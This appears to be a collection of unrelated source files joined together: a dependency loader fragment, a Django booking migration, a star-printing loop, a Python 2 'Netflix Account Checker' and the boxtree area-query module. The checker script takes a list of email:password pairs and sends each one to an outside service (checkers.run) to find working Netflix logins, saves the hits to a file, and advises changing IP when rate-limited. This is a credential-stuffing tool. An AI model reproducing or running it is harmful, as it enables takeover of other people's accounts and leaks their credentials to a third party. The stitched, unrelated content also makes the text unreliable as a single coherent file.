if d.startswith(">"):
self._addToImportSet(d[1:])
else:
self._addToImportSet(d)
def _tryImport(self, trace=False):
if not self._importSet:
return
toImport = set()
for p in self._importSet:
now = self._packs[p]
okay = True
for d in now["deps"]:
if d.startswith(">"):
# okay
pass
elif d not in self._packs:
# TODO: WARNING
pass
elif self._packs[d]["state"] < LoadState.STATE_IMPORTED:
# Check if from same file
if self._packs[d]["file"] != now["file"]:
okay = False
if trace:
# TODO: Trace
pass
break
if okay:
if now["state"] <= LoadState.STATE_SEEN:
toImport.add(p)
self._importSet = self._importSet ^ toImport
# Now import them all
self.printMsg("Importing "+", ".join(toImport))
for p in toImport:
self._doImportFile(self._packs[p]["file"], self._packs[p]["type"], p)
def _doImportFile(self, file, type, pack):
f = self._files[file]
if self._packs[pack]["state"] == LoadState.STATE_SEEN:
self._packs[pack]["state"] = LoadState.STATE_IMPORTING
self.provide(pack, type)
else:
if file not in self._files:
self._files[file] = [[], [], False]
if f[2]:
return
f[2] = True
for p in f[0]:
self._packs[p]["state"] = LoadState.STATE_IMPORTING
self._handler.load_file(self, file, f[0], type)
def abort(self):
self._importSet = []
def isImported(self, name):
return name in self._packs and self._packs[name]["state"] >= LoadState.STATE_IMPORTED
def addDependency(self, file, provided, required, size, type):
for p in provided:
if (p not in self._packs)\
or (self._packs[p]["state"] <= LoadState.STATE_NONE and\
(self._packs[p]["file"] not in self._files or len(provided)>len(self._files[self._packs[p]["file"]][0]))\
):
self._packs[p] = {
"file":file,
"state":LoadState.STATE_NONE,
"deps":required,
"size":size,
"type":type,
"evalOnImport":False
}
self._files[file] = [provided, required, False]
def loadDepsObject(self, data, absolutePath):
if isinstance(data, string_types):
data = json.loads(data)
deps = data["packages"]
for d in deps:
if ":" not in d[0] and not d[0].startswith("/"):
d[0] = path.join(absolutePath, d[0])
self.addDependency(d[0], d[1], d[2], d[3], d[4])
# Logic for external deps
def loadDeps(self, file):
self.printMsg("Reading dependancy file "+file)
absolutePath = path.dirname(path.abspath(file))
with open(file, "r") as f:
data = f.read()
self.loadDepsObject(data, absolutePath)
def importAndEvaluate(self, pack):
self.importPack(pack)
self.evaluate(pack)
def lie(self, list, pack):
self.loadDeps(list)
self.importAndEvaluate(pack)
def getDependencies(self, pack):
return self._packs[pack]["deps"]
|
# Generated by Django 2.2.7 on 2019-12-02 17:03
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import utils.mixins
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='City',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, unique=True)),
('lat', models.FloatField()),
('lon', models.FloatField()),
],
options={
'verbose_name_plural': 'cities',
'ordering': ['name'],
},
),
migrations.CreateModel(
name='Comfort',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comfort_type', models.CharField(choices=[('ЭК', 'Эконом'), ('КМФ', 'Комфорт'), ('БИЗ', 'Бизнес'), ('ПКЛ', 'Первый класс')], default='', max_length=3)),
],
options={
'verbose_name_plural': 'comfort_types',
'ordering': ['pk'],
},
),
migrations.CreateModel(
name='Passenger',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('surname', models.CharField(max_length=20)),
('name', models.CharField(max_length=20)),
('patronymic', models.CharField(max_length=20)),
('phone', models.PositiveIntegerField(max_length=13, unique=True)),
('passport_series', models.CharField(max_length=2)),
('passport_number', models.CharField(max_length=7, unique=True)),
('email', models.EmailField(max_length=254, unique=True)),
],
options={
'verbose_name_plural': 'passengers',
'ordering': ['surname'],
},
),
migrations.CreateModel(
name='Plane',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('plane_num', models.CharField(default='', max_length=5, unique=True)),
('plane_model', models.CharField(default='AirBus A319', max_length=20)),
('dep_time', models.TimeField()),
('arr_time', models.TimeField()),
('comfort_type', models.CharField(choices=[('ЭК', 'Эконом'), ('КМФ', 'Комфорт'), ('БИЗ', 'Бизнес'), ('ПКЛ', 'Первый класс')], default='', max_length=3)),
('arr_station', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='arrival_plane', to='booking.City')),
('dep_station', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='departure_plane', to='booking.City')),
('user', models.ForeignKey(default='3', on_delete=django.db.models.deletion.CASCADE, related_name='user_info', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'planes',
'ordering': ['dep_station'],
},
),
migrations.CreateModel(
name='Flight',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('booked_plane', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_plane', to='booking.Plane')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_flight', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'flights',
'ordering': ['user'],
},
bases=(utils.mixins.StrReprMixin, models.Model),
),
]
|
for i in range(5):
print(('*'*(5-i)) + (" "*i*2) + ('*'*(5-i)))
for i in range(1,6):
print(('*'*i) + (" "*2*(5-i)) + ('*'*i))
|
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
#Author D4RK5H4D0W5
C0 = "\033[0;36m"
C1 = "\033[1;36m"
G0 = "\033[0;32m"
G1 = "\033[1;32m"
W0 = "\033[0;37m"
W1 = "\033[1;37m"
R0 = "\033[0;31m"
R1 = "\033[1;31m"
try: import requests, sys, os, json
except: os.system('pip2 install requests')
try:
os.system('clear')
print '''%s
_ __ __ ______
/ |/ /__ / /_/ _/ (_)_ __ %sCoded by Ahmdo%s
/ / -_) __/ _/ / /\ \ / %sNetflix Account Checker%s
/_/|_/\__/\__/_//_/_//_\_\ %netflix.com
'''%(C1,W0,C1,W0,C1,W0)
for akun in open(sys.argv[1]).read().splitlines():
api=requests.post('https://checkers.run/nf-free/check-account',data={'account':akun}).text
js=json.loads(api)
if js['limit'] == True:
exit('%s[ %sLIMIT %s] Change your IP'%(W0,R0,W0))
elif js['screens'] == '-':
print '%s[ %sNot working %s] %s'%(W0,R0,W0,akun)
else:
print '%s[ %sWorking %s] %s'%(W0,G0,W0,akun)
print '%s[ %sScreens %s] %s'%(W0,G0,W0,js['screens'])
print '%s[ %sLanguage%s] %s'%(W0,G0,W0,js['language'])
print '%s[ %s Valid %s] %s'%(W0,G0,W0,js['until'])
open('working.txt','a+').write(akun+'\n')
print
print
print '%s[ %sDONE %s] Saved in working.txt'%(W0,G0,W0)
except requests.exceptions.ConnectionError:
exit('%s[%s!%s] %sCheck internet'%(W1,R1,W1,W0))
except IndexError:
exit('%s[%s!%s] %sUse : python2 %s target.txt \n%s[%s!%s] %sFill in target.txt as follows user@email.com:password'%(W1,R1,W1,W0,sys.argv[0],W1,R1,W1,W0))
except IOError:
exit('%s[%s!%s] %sFile does not exist'%(W1,R1,W1,W0))
except KeyboardInterrupt:
exit('\n%s[%s!%s] %sExit'%(W1,R1,W1,W0))
|
__copyright__ = """
Copyright (C) 2013 Andreas Kloeckner
Copyright (C) 2016 Matt Wala"""
__license__ = """
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import logging
from functools import partial
import numpy as np
from mako.template import Template
import pyopencl as cl
import pyopencl.array # noqa
import pyopencl.cltypes # noqa
from pytools import ProcessLogger, memoize_method
from boxtree.tools import (
AXIS_NAMES, DeviceDataRecord, coord_vec_subscript_code, get_coord_vec_dtype)
logger = logging.getLogger(__name__)
__doc__ = """
Area queries (Balls -> overlapping leaves)
------------------------------------------
.. autoclass:: AreaQueryBuilder
.. autoclass:: AreaQueryResult
Inverse of area query (Leaves -> overlapping balls)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.. autoclass:: LeavesToBallsLookupBuilder
.. autoclass:: LeavesToBallsLookup
Space invader queries
^^^^^^^^^^^^^^^^^^^^^
.. autoclass:: SpaceInvaderQueryBuilder
Peer Lists
^^^^^^^^^^
Area queries are implemented using peer lists.
.. autoclass:: PeerListFinder
.. autoclass:: PeerListLookup
"""
# {{{ output
class PeerListLookup(DeviceDataRecord):
"""
.. attribute:: tree
The :class:`boxtree.Tree` instance used to build this lookup.
.. attribute:: peer_list_starts
Indices into :attr:`peer_lists`.
``peer_lists[peer_list_starts[box_id]:peer_list_starts[box_id]+1]``
contains the list of peer boxes of box `box_id`.
.. attribute:: peer_lists
.. automethod:: get
.. versionadded:: 2016.1
"""
class AreaQueryResult(DeviceDataRecord):
"""
.. attribute:: tree
The :class:`boxtree.Tree` instance used to build this lookup.
.. attribute:: leaves_near_ball_starts
Indices into :attr:`leaves_near_ball_lists`.
``leaves_near_ball_lists[leaves_near_ball_starts[ball_nr]:
leaves_near_ball_starts[ball_nr]+1]``
results in a list of leaf boxes that intersect `ball_nr`.
.. attribute:: leaves_near_ball_lists
.. automethod:: get
.. versionadded:: 2016.1
"""
class LeavesToBallsLookup(DeviceDataRecord):
"""
.. attribute:: tree
The :class:`boxtree.Tree` instance used to build this lookup.
.. attribute:: balls_near_box_starts
Indices into :attr:`balls_near_box_lists`.
``balls_near_box_lists[balls_near_box_starts[ibox]:
balls_near_box_starts[ibox]+1]``
results in a list of balls that overlap leaf box *ibox*.
.. note:: Only leaf boxes have non-empty entries in this table. Nonetheless,
this list is indexed by the global box index.
.. attribute:: balls_near_box_lists
.. automethod:: get
"""
# }}}
# {{{ kernel templates
GUIDING_BOX_FINDER_MACRO = r"""//CL:mako//
<%def name="initialize_coord_vec(vector_name, entries)">
<% assert len(entries) == dimensions %>
${vector_name} = (coord_vec_t) (${", ".join(entries)});
</%def>
<%def name="find_guiding_box(ball_center, ball_radius, box='guiding_box')">
box_id_t ${box} = 0;
{
//
// Step 1: Ensure that the center is within the bounding box.
//
coord_vec_t query_center, bbox_min, bbox_max;
${initialize_coord_vec(
"bbox_min", ["bbox_min_" + ax for ax in AXIS_NAMES[:dimensions]])}
// bbox_max should be smaller than the true bounding box, so that
// (query_center - bbox_min) / root_extent entries are in the half open
// interval [0, 1).
bbox_max = bbox_min + (coord_t) (
root_extent / (1 + ${root_extent_stretch_factor}));
query_center = min(bbox_max, max(bbox_min, ${ball_center}));
//
// Step 2: Compute the query radius. This can be effectively
// smaller than the original ball radius, if the center
// isn't in the bounding box (see picture):
//
// +-----------+
// | |
// | |
// | |
// +-------|-+ |
// | | | |
// | +-----------+ <= bounding box
// | |
// | |
// +---------+ <= query box
//
// <---> <= original radius
// <> <= effective radius
//
coord_t query_radius = 0;
%for mnr in range(2**dimensions):
{
coord_vec_t offset;
${initialize_coord_vec("offset",
["{sign}{ball_radius}".format(
sign="+" if (2**(dimensions-1-idim) & mnr) else "-",
ball_radius=ball_radius)
for idim in range(dimensions)])}
coord_vec_t corner = min(
bbox_max, max(bbox_min, ${ball_center} + offset));
coord_vec_t dist = fabs(corner - query_center);
%for i in range(dimensions):
query_radius = fmax(query_radius, ${cvec_sub("dist", i)});
%endfor
}
%endfor
//
// Step 3: Find the guiding box.
//
// Descend when root is not the guiding box.
if (LEVEL_TO_RAD(0) / 2 >= query_radius)
{
for (unsigned box_level = 0;; ++box_level)
{
if (/* Found leaf? */
!(box_flags[${box}] & BOX_HAS_SOURCE_OR_TARGET_CHILD_BOXES)
/* Found guiding box? */
|| (LEVEL_TO_RAD(box_level) / 2 < query_radius
&& query_radius <= LEVEL_TO_RAD(box_level)))
{
break;
}
// Find the child containing the ball center.
//
// Logic intended to match the morton nr scan kernel.
coord_vec_t offset_scaled =
(query_center - bbox_min) / root_extent;
// Invariant: offset_scaled entries are in [0, 1).
%for ax in AXIS_NAMES[:dimensions]:
unsigned ${ax}_bits = (unsigned) (
offset_scaled.${ax} * (1U << (1 + box_level)));
%endfor
// Pick off the lowest-order bit for each axis, put it in
// its place.
int level_morton_number = 0
%for iax, ax in enumerate(AXIS_NAMES[:dimensions]):
| (${ax}_bits & 1U) << (${dimensions-1-iax})
%endfor
;
box_id_t next_box = box_child_ids[
level_morton_number * aligned_nboxes + ${box}];
if (next_box)
{
${box} = next_box;
}
else
{
// Child does not exist, this must be the guiding box
break;
}
}
}
}
</%def>
"""
AREA_QUERY_WALKER_BODY = r"""
coord_vec_t ball_center;
coord_t ball_radius;
${get_ball_center_and_radius("ball_center", "ball_radius", "i")}
///////////////////////////////////
// Step 1: Find the guiding box. //
///////////////////////////////////
${find_guiding_box("ball_center", "ball_radius")}
//////////////////////////////////////////////////////
// Step 2 - Walk the peer boxes to find the leaves. //
//////////////////////////////////////////////////////
for (peer_list_idx_t pb_i = peer_list_starts[guiding_box],
pb_e = peer_list_starts[guiding_box+1]; pb_i < pb_e; ++pb_i)
{
box_id_t peer_box = peer_lists[pb_i];
if (!(box_flags[peer_box] & BOX_HAS_SOURCE_OR_TARGET_CHILD_BOXES))
{
bool is_overlapping;
${check_l_infty_ball_overlap(
"is_overlapping", "peer_box", "ball_radius", "ball_center")}
if (is_overlapping)
{
${leaf_found_op("peer_box", "ball_center", "ball_radius")}
}
}
else
{
${walk_init("peer_box")}
while (continue_walk)
{
${walk_get_box_id()}
if (walk_box_id)
{
if (!(box_flags[walk_box_id]
& BOX_HAS_SOURCE_OR_TARGET_CHILD_BOXES))
{
bool is_overlapping;
${check_l_infty_ball_overlap(
"is_overlapping", "walk_box_id",
"ball_radius", "ball_center")}
if (is_overlapping)
{
${leaf_found_op(
"walk_box_id", "ball_center", "ball_radius")}
}
}
else
{
// We want to descend into this box. Put the current state
// on the stack.
${walk_push("walk_box_id")}
continue;
}
}
${walk_advance()}
}
}
}
"""
AREA_QUERY_TEMPLATE = (
GUIDING_BOX_FINDER_MACRO + r"""//CL//
typedef ${dtype_to_ctype(ball_id_dtype)} ball_id_t;
typedef ${dtype_to_ctype(peer_list_idx_dtype)} peer_list_idx_t;
<%def name="get_ball_center_and_radius(ball_center, ball_radius, i)">
%for ax in AXIS_NAMES[:dimensions]:
${ball_center}.${ax} = ball_${ax}[${i}];
%endfor
${ball_radius} = ball_radii[${i}];
</%def>
<%def name="leaf_found_op(leaf_box_id, ball_center, ball_radius)">
APPEND_leaves(${leaf_box_id});
</%def>
void generate(LIST_ARG_DECL USER_ARG_DECL ball_id_t i)
{
"""
+ AREA_QUERY_WALKER_BODY
+ """
}
""")
PEER_LIST_FINDER_TEMPLATE = r"""//CL//
void generate(LIST_ARG_DECL USER_ARG_DECL box_id_t box_id)
{
${load_center("center", "box_id")}
if (box_id == 0)
{
// Peer of root = self
APPEND_peers(box_id);
return;
}
int level = box_levels[box_id];
// To find this box's peers, start at the top of the tree, descend
// into adjacent (or overlapping) parents.
${walk_init(0)}
while (continue_walk)
{
${walk_get_box_id()}
if (walk_box_id)
{
${load_center("walk_center", "walk_box_id")}
// walk_box_id lives on level walk_stack_size+1.
bool a_or_o = is_adjacent_or_overlapping(root_extent,
center, level, walk_center, walk_stack_size+1);
if (a_or_o)
{
// walk_box_id lives on level walk_stack_size+1.
if (walk_stack_size+1 == level)
{
APPEND_peers(walk_box_id);
}
else if (!(box_flags[walk_box_id]
& BOX_HAS_SOURCE_OR_TARGET_CHILD_BOXES))
{
APPEND_peers(walk_box_id);
}
else
{
// Check if any children are adjacent or overlapping.
// If not, this box must be a peer.
bool must_be_peer = true;
for (int morton_nr = 0;
must_be_peer && morton_nr < ${2**dimensions};
++morton_nr)
{
box_id_t next_child_id = box_child_ids[
morton_nr * aligned_nboxes + walk_box_id];
if (next_child_id)
{
${load_center("next_walk_center", "next_child_id")}
must_be_peer &= !is_adjacent_or_overlapping(root_extent,
center, level, next_walk_center, walk_stack_size+2);
}
}
if (must_be_peer)
{
APPEND_peers(walk_box_id);
}
else
{
// We want to descend into this box. Put the current state
// on the stack.
${walk_push("walk_box_id")}
continue;
}
}
}
}
${walk_advance()}
}
}
"""
from pyopencl.elementwise import ElementwiseTemplate
from boxtree.tools import InlineBinarySearch
STARTS_EXPANDER_TEMPLATE = ElementwiseTemplate(
arguments=r"""
idx_t *dst,
idx_t *starts,
idx_t starts_len
""",
operation=r"""//CL//
/* Find my index in starts, place the index in dst. */
dst[i] = bsearch(starts, starts_len, i);
""",
name="starts_expander",
preamble=str(InlineBinarySearch("idx_t")))
# }}}
# {{{ area query elementwise template
class AreaQueryElementwiseTemplate:
"""
Experimental: Intended as a way to perform operations in the body of an area
query.
"""
@staticmethod
def unwrap_args(tree, peer_lists, *args):
return (tree.box_centers,
tree.root_extent,
tree.box_levels,
tree.aligned_nboxes,
tree.box_child_ids,
tree.box_flags,
peer_lists.peer_list_starts,
peer_lists.peer_lists) + tuple(tree.bounding_box[0]) + args
def __init__(self, extra_args, ball_center_and_radius_expr,
leaf_found_op, preamble="", name="area_query_elwise"):
def wrap_in_macro(decl, expr):
return """
<%def name=\"{decl}\">
{expr}
</%def>
""".format(decl=decl, expr=expr)
from boxtree.traversal import TRAVERSAL_PREAMBLE_MAKO_DEFS
self.elwise_template = ElementwiseTemplate(
arguments=r"""//CL:mako//
coord_t *box_centers,
coord_t root_extent,
box_level_t *box_levels,
box_id_t aligned_nboxes,
box_id_t *box_child_ids,
box_flags_t *box_flags,
peer_list_idx_t *peer_list_starts,
box_id_t *peer_lists,
%for ax in AXIS_NAMES[:dimensions]:
coord_t bbox_min_${ax},
%endfor
""" + extra_args,
operation="//CL:mako//\n"
+ wrap_in_macro(
"get_ball_center_and_radius(ball_center, ball_radius, i)",
ball_center_and_radius_expr)
+ wrap_in_macro(
"leaf_found_op(leaf_box_id, ball_center, ball_radius)",
leaf_found_op)
+ TRAVERSAL_PREAMBLE_MAKO_DEFS
+ GUIDING_BOX_FINDER_MACRO
+ AREA_QUERY_WALKER_BODY,
name=name,
preamble=preamble)
def generate(self, context,
dimensions, coord_dtype, box_id_dtype,
peer_list_idx_dtype, max_levels,
extra_var_values=(), extra_type_aliases=(),
extra_preamble=""):
from pyopencl.cltypes import vec_types
from pyopencl.tools import dtype_to_ctype
from boxtree import box_flags_enum
from boxtree.traversal import TRAVERSAL_PREAMBLE_TYPEDEFS_AND_DEFINES
from boxtree.tree_build import TreeBuilder
render_vars = (
("np", np),
("dimensions", dimensions),
("dtype_to_ctype", dtype_to_ctype),
("box_id_dtype", box_id_dtype),
("particle_id_dtype", None),
("coord_dtype", coord_dtype),
("get_coord_vec_dtype", get_coord_vec_dtype),
("cvec_sub", partial(coord_vec_subscript_code, dimensions)),
("max_levels", max_levels),
("AXIS_NAMES", AXIS_NAMES),
("box_flags_enum", box_flags_enum),
("peer_list_idx_dtype", peer_list_idx_dtype),
("debug", False),
("root_extent_stretch_factor", TreeBuilder.ROOT_EXTENT_STRETCH_FACTOR),
# FIXME This gets used in pytential with a template that still uses this:
("vec_types", tuple(vec_types.items())),
)
preamble = Template(
# HACK: box_flags_t and coord_t are defined here and
# in the template below, so disable typedef redefinition warnings.
"""
#pragma clang diagnostic push
#pragma clang diagnostic ignored "-Wtypedef-redefinition"
"""
+ TRAVERSAL_PREAMBLE_TYPEDEFS_AND_DEFINES
+ """
#pragma clang diagnostic pop
""",
strict_undefined=True).render(**dict(render_vars))
return self.elwise_template.build(context,
type_aliases=(
("coord_t", coord_dtype),
("box_id_t", box_id_dtype),
("peer_list_idx_t", peer_list_idx_dtype),
("box_level_t", np.uint8),
("box_flags_t", box_flags_enum.dtype),
) + extra_type_aliases,
var_values=render_vars + extra_var_values,
more_preamble=preamble + extra_preamble)
SPACE_INVADER_QUERY_TEMPLATE = AreaQueryElementwiseTemplate(
extra_args="""
coord_t *ball_radii,
float *outer_space_invader_dists,
%for ax in AXIS_NAMES[:dimensions]:
coord_t *ball_${ax},
%endfor
""",
ball_center_and_radius_expr=r"""
${ball_radius} = ball_radii[${i}];
%for ax in AXIS_NAMES[:dimensions]:
${ball_center}.${ax} = ball_${ax}[${i}];
%endfor
""",
leaf_found_op=r"""
{
${load_center("leaf_center", leaf_box_id)}
coord_t max_dist = 0;
%for i in range(dimensions):
max_dist = fmax(max_dist,
distance(
${cvec_sub(ball_center, i)},
${cvec_sub("leaf_center", i)}));
%endfor
// The atomic max operation supports only integer types.
// However, max_dist is of a floating point type.
// For comparison purposes we reinterpret the bits of max_dist
// as an integer. The comparison result is the same as for positive
// IEEE floating point numbers, so long as the float/int endianness
// matches (fingers crossed).
atomic_max(
(volatile __global int *)
&outer_space_invader_dists[${leaf_box_id}],
as_int((float) max_dist));
}""",
name="space_invader_query")
# }}}
# {{{ area query build
class AreaQueryBuilder:
r"""Given a set of :math:`l^\infty` "balls", this class helps build a
look-up table from ball to leaf boxes that intersect with the ball.
.. versionadded:: 2016.1
.. automethod:: __init__
.. automethod:: __call__
"""
def __init__(self, context):
self.context = context
self.peer_list_finder = PeerListFinder(self.context)
# {{{ Kernel generation
@memoize_method
def get_area_query_kernel(self, dimensions, coord_dtype, box_id_dtype,
ball_id_dtype, peer_list_idx_dtype, max_levels):
from pyopencl.tools import dtype_to_ctype
from boxtree import box_flags_enum
logger.debug("start building area query kernel")
from boxtree.traversal import TRAVERSAL_PREAMBLE_TEMPLATE
from boxtree.tree_build import TreeBuilder
template = Template(
TRAVERSAL_PREAMBLE_TEMPLATE
+ AREA_QUERY_TEMPLATE,
strict_undefined=True)
render_vars = {
"np": np,
"dimensions": dimensions,
"dtype_to_ctype": dtype_to_ctype,
"box_id_dtype": box_id_dtype,
"particle_id_dtype": None,
"coord_dtype": coord_dtype,
"get_coord_vec_dtype": get_coord_vec_dtype,
"cvec_sub": partial(coord_vec_subscript_code, dimensions),
"max_levels": max_levels,
"AXIS_NAMES": AXIS_NAMES,
"box_flags_enum": box_flags_enum,
"peer_list_idx_dtype": peer_list_idx_dtype,
"ball_id_dtype": ball_id_dtype,
"debug": False,
"root_extent_stretch_factor": TreeBuilder.ROOT_EXTENT_STRETCH_FACTOR,
}
from boxtree.tools import ScalarArg, VectorArg
arg_decls = [
VectorArg(coord_dtype, "box_centers", with_offset=False),
ScalarArg(coord_dtype, "root_extent"),
VectorArg(np.uint8, "box_levels"),
ScalarArg(box_id_dtype, "aligned_nboxes"),
VectorArg(box_id_dtype, "box_child_ids", with_offset=False),
VectorArg(box_flags_enum.dtype, "box_flags"),
VectorArg(peer_list_idx_dtype, "peer_list_starts"),
VectorArg(box_id_dtype, "peer_lists"),
VectorArg(coord_dtype, "ball_radii"),
] + [
ScalarArg(coord_dtype, "bbox_min_"+ax)
for ax in AXIS_NAMES[:dimensions]
] + [
VectorArg(coord_dtype, "ball_"+ax)
for ax in AXIS_NAMES[:dimensions]]
from pyopencl.algorithm import ListOfListsBuilder
area_query_kernel = ListOfListsBuilder(
self.context,
[("leaves", box_id_dtype)],
str(template.render(**render_vars)),
arg_decls=arg_decls,
name_prefix="area_query",
count_sharing={},
complex_kernel=True)
logger.debug("done building area query kernel")
return area_query_kernel
# }}}
def __call__(self, queue, tree, ball_centers, ball_radii, peer_lists=None,
wait_for=None):
"""
:arg queue: a :class:`pyopencl.CommandQueue`
:arg tree: a :class:`boxtree.Tree`.
:arg ball_centers: an object array of coordinate
:class:`pyopencl.array.Array` instances.
Their *dtype* must match *tree*'s
:attr:`boxtree.Tree.coord_dtype`.
:arg ball_radii: a
:class:`pyopencl.array.Array`
of positive numbers.
Its *dtype* must match *tree*'s
:attr:`boxtree.Tree.coord_dtype`.
:arg peer_lists: may either be *None* or an instance of
:class:`PeerListLookup` associated with `tree`.
:arg wait_for: may either be *None* or a list of :class:`pyopencl.Event`
instances for whose completion this command waits before starting
exeuction.
:returns: a tuple *(aq, event)*, where *aq* is an instance of
:class:`AreaQueryResult`, and *event* is a :class:`pyopencl.Event`
for dependency management.
"""
from pytools import single_valued
if single_valued(bc.dtype for bc in ball_centers) != tree.coord_dtype:
raise TypeError("ball_centers dtype must match tree.coord_dtype")
if ball_radii.dtype != tree.coord_dtype:
raise TypeError("ball_radii dtype must match tree.coord_dtype")
ball_id_dtype = tree.particle_id_dtype # ?
from pytools import div_ceil
# Avoid generating too many kernels.
max_levels = div_ceil(tree.nlevels, 10) * 10
if peer_lists is None:
peer_lists, evt = self.peer_list_finder(queue, tree, wait_for=wait_for)
wait_for = [evt]
if len(peer_lists.peer_list_starts) != tree.nboxes + 1:
raise ValueError("size of peer lists must match with number of boxes")
area_query_kernel = self.get_area_query_kernel(tree.dimensions,
tree.coord_dtype, tree.box_id_dtype, ball_id_dtype,
peer_lists.peer_list_starts.dtype, max_levels)
aq_plog = ProcessLogger(logger, "area query")
result, evt = area_query_kernel(
queue, len(ball_radii),
tree.box_centers.data, tree.root_extent,
tree.box_levels, tree.aligned_nboxes,
tree.box_child_ids.data, tree.box_flags,
peer_lists.peer_list_starts,
peer_lists.peer_lists, ball_radii,
*(tuple(tree.bounding_box[0])
+ tuple(bc for bc in ball_centers)),
wait_for=wait_for)
aq_plog.done()
return AreaQueryResult(
tree=tree,
leaves_near_ball_starts=result["leaves"].starts,
leaves_near_ball_lists=result["leaves"].lists).with_queue(None), evt
# }}}
# {{{ area query transpose (leaves-to-balls) lookup build
class LeavesToBallsLookupBuilder:
r"""Given a set of :math:`l^\infty` "balls", this class helps build a
look-up table from leaf boxes to balls that overlap with each leaf box.
.. automethod:: __init__
.. automethod:: __call__
"""
def __init__(self, context):
self.context = context
from pyopencl.algorithm import KeyValueSorter
self.key_value_sorter = KeyValueSorter(context)
self.area_query_builder = AreaQueryBuilder(context)
@memoize_method
def get_starts_expander_kernel(self, idx_dtype):
"""
Expands a "starts" array into a length starts[-1] array of increasing
indices:
Eg: [0 2 5 6] => [0 0 1 1 1 2]
"""
return STARTS_EXPANDER_TEMPLATE.build(
self.context,
type_aliases=(("idx_t", idx_dtype),))
def __call__(self, queue, tree, ball_centers, ball_radii, peer_lists=None,
wait_for=None):
"""
:arg queue: a :class:`pyopencl.CommandQueue`
:arg tree: a :class:`boxtree.Tree`.
:arg ball_centers: an object array of coordinate
:class:`pyopencl.array.Array` instances.
Their *dtype* must match *tree*'s
:attr:`boxtree.Tree.coord_dtype`.
:arg ball_radii: a
:class:`pyopencl.array.Array`
of positive numbers.
Its *dtype* must match *tree*'s
:attr:`boxtree.Tree.coord_dtype`.
:arg peer_lists: may either be *None* or an instance of
:class:`PeerListLookup` associated with `tree`.
:arg wait_for: may either be *None* or a list of :class:`pyopencl.Event`
instances for whose completion this command waits before starting
execution.
:returns: a tuple *(lbl, event)*, where *lbl* is an instance of
:class:`LeavesToBallsLookup`, and *event* is a :class:`pyopencl.Event`
for dependency management.
"""
from pytools import single_valued
if single_valued(bc.dtype for bc in ball_centers) != tree.coord_dtype:
raise TypeError("ball_centers dtype must match tree.coord_dtype")
if ball_radii.dtype != tree.coord_dtype:
raise TypeError("ball_radii dtype must match tree.coord_dtype")
ltb_plog = ProcessLogger(logger, "leaves-to-balls lookup: run area query")
area_query, evt = self.area_query_builder(
queue, tree, ball_centers, ball_radii, peer_lists, wait_for)
wait_for = [evt]
logger.debug("leaves-to-balls lookup: expand starts")
nkeys = tree.nboxes
nballs_p_1 = len(area_query.leaves_near_ball_starts)
assert nballs_p_1 == len(ball_radii) + 1
# We invert the area query in two steps:
#
# 1. Turn the area query result into (ball number, box number) pairs.
# This is done in the "starts expander kernel."
#
# 2. Key-value sort the (ball number, box number) pairs by box number.
starts_expander_knl = self.get_starts_expander_kernel(tree.box_id_dtype)
expanded_starts = cl.array.empty(
queue, len(area_query.leaves_near_ball_lists), tree.box_id_dtype)
evt = starts_expander_knl(
expanded_starts,
area_query.leaves_near_ball_starts.with_queue(queue),
nballs_p_1)
wait_for = [evt]
logger.debug("leaves-to-balls lookup: key-value sort")
balls_near_box_starts, balls_near_box_lists, evt \
= self.key_value_sorter(
queue,
# keys
area_query.leaves_near_ball_lists.with_queue(queue),
# values
expanded_starts,
nkeys, starts_dtype=tree.box_id_dtype,
wait_for=wait_for)
ltb_plog.done()
return LeavesToBallsLookup(
tree=tree,
balls_near_box_starts=balls_near_box_starts,
balls_near_box_lists=balls_near_box_lists).with_queue(None), evt
# }}}
# {{{ space invader query build
class SpaceInvaderQueryBuilder:
r"""
Given a set of :math:`l^\infty` "balls", this class helps build a look-up
table which maps leaf boxes to the *outer space invader distance*.
This is defined below but roughly, from the point of view
of a leaf box, it is the farthest "leaf center to ball center" distance among
all balls that intersect the leaf box.
Formally, given a leaf box :math:`b`, the *outer space invader distance* is
defined by the following expression (here :math:`d_\infty` is the
:math:`\infty` norm):
.. math::
\max \left( \{ d_{\infty}(\text{center}(b), \text{center}(b^*))
: b^* \text{ is a ball}, b^* \cap b \neq \varnothing \}
\cup \{ 0 \} \right)
.. automethod:: __init__
.. automethod:: __call__
"""
def __init__(self, context):
self.context = context
self.peer_list_finder = PeerListFinder(self.context)
# {{{ Kernel generation
